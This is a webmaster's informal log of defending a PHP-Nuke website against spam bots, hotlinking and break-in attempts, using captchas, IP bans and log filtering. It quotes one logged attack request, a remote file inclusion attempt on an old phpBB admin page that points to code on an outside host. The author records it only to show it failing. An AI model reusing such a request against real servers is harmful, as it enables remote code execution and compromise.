Some time ago, I added a captcha to the feedback-module and the submit-module. I've done this to prevent people robots from spamming me, as this is happening more and more.

Per day I see around 45 attempts to automatically post something. One other way to deal with automated spam, is renaming the feedback-module to something else or just adding a word that has to be retyped, if you're original the scripts won't work. For now, I have added the addresses to the ip-ban table nuke_banned_ip, so they can't try again. I'm working on a script that checks the apache logs for POST messages, filters out the feedback and submit pages and then sorts the ip-addresses. Of course I would have to manually filter out the messages I really received. To start of, I would use something like

grep POST /var/log/httpd/access* | egrep 'feedback|submit' | awk ' { print $2 } '| sort -u

Someone is trying very hard to install perlbot on this server, and he's using a real old exploit in phpbb. This is installed, but not active, so all attempts ( GET /modules/Forums/admin/admin_board.php?phpbb_root_path=http://www.cavcav.net/levo.dat? HTTP/1.1" 200 9746 "-" "libwww-perl/5.65" ) just fail, but the CMS keeps gently denying access.

11 attempts at nov-8
63 attempts at nov-9
112 attempts at nov-10, they appear 6 times per hour.

I have been monitoring and changing the url-rewriting-part, and everything seems stable now. The results so far are:

  • Google has 772 links for this website. None of them have the new, longer name. That would take more time, so I'll just wait. Funny thing is, that almost all the links to stories are to the printer-friendly-page.
  • Yahoo has 11500 links for this website. None of them have the new, longer name.
  • MSN has 52086 links for this website. Some of them have the longer names.

Just when jou think you've got everything covered, something unexpected pops up. Someone is linking to one of the sounds (this one) in a forum, so my server is serving this file to everyone who browses this thread. This file has become the most wanted file in just one-and-a-half hour, it has been requested over 500 times. I stopped this hotlinking by adding the wav-extension to the hotlinking-prevention-script.

It's becomming almost a daily task to remove all kinds of spam from this website. And I'm not alone. This week I'm finding some new spam, this day already twice. Someone is adding links and submitting news, probably hoping that the entries get approved automatically. To prevent more spamming, I have added a captcha to the page that submits news, and I have simply renamed the link-module. The link-module uses some static names, I had to alter the source a little. This will prevent anyone from using a generic PHP-Nuke url to add a link. Soon I discovered that this didn't help, so I changed the configuration so only members are allowed to post links.